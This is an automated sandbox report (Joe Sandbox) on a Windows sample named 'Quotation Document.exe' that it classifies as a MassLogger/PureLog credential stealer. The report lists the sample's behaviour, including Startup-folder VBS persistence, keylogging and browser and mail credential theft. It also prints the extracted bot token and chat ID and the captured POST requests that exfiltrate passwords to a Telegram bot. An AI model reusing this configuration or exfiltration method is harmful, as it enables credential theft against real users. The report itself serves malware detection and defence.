Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation Document.exe

Overview

General Information

Sample name:Quotation Document.exe
Analysis ID:1546477
MD5:cd3c7f532dcffd81361915bf691cfbd0
SHA1:ddaa78fa6df0b9f19a0b7c9e8f54c4224f6a7a14
SHA256:5e3521bee81bb39dae47648627ea8810f88dc0a16055efa1eadd779f804f60f1
Tags:exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quotation Document.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\Quotation Document.exe" MD5: CD3C7F532DCFFD81361915BF691CFBD0)
    • neophobia.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\Quotation Document.exe" MD5: CD3C7F532DCFFD81361915BF691CFBD0)
      • RegSvcs.exe (PID: 8080 cmdline: "C:\Users\user\Desktop\Quotation Document.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 2000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • neophobia.exe (PID: 1900 cmdline: "C:\Users\user\AppData\Local\emboweling\neophobia.exe" MD5: CD3C7F532DCFFD81361915BF691CFBD0)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI", "Telegram Chatid": "5679778644"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 B3 88 44 24 2B 88 44 24 2F B0 B8 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 25 entries
          SourceRuleDescriptionAuthorStrings
          7.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 B3 88 44 24 2B 88 44 24 2F B0 B8 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          7.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 B3 88 44 24 2B 88 44 24 2F B0 B8 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          7.2.RegSvcs.exe.2ba0000.4.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            7.2.RegSvcs.exe.2ba0000.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.RegSvcs.exe.2ba0000.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 93 entries

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , ProcessId: 2000, ProcessName: wscript.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , ProcessId: 2000, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\emboweling\neophobia.exe, ProcessId: 7760, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T00:37:15.917486+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449730TCP
                2024-11-01T00:37:55.525342+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449736TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T00:38:46.434821+010028032742Potentially Bad Traffic192.168.2.449826193.122.6.16880TCP
                2024-11-01T00:38:52.887926+010028032742Potentially Bad Traffic192.168.2.449826193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI", "Telegram Chatid": "5679778644"}
                Source: RegSvcs.exe.8080.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendMessage"}
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeReversingLabs: Detection: 65%
                Source: Quotation Document.exeReversingLabs: Detection: 65%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeJoe Sandbox ML: detected
                Source: Quotation Document.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Quotation Document.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49827 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49828 version: TLS 1.2
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_0293E278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F504Fh7_2_050F4C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F48F9h7_2_050F4648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050FF799h7_2_050FF4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F504Fh7_2_050F4F7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050FFBF1h7_2_050FF948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050FF341h7_2_050FF098
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]7_2_064D5C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]7_2_064D2B2C

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77 HTTP/1.1Content-Type: multipart/form-data; boundary================8dcf9e3a617256dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49826 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49827 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77 HTTP/1.1Content-Type: multipart/form-data; boundary================8dcf9e3a617256dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000007.00000002.2906364224.0000000005412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.s
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77l
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49828 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: Quotation Document.exe
                Source: initial sampleStatic PE information: Filename: Quotation Document.exe
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00408C607_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040DC117_2_0040DC11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00407C3F7_2_00407C3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00418CCC7_2_00418CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00406CA07_2_00406CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004028B07_2_004028B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041A4BE7_2_0041A4BE
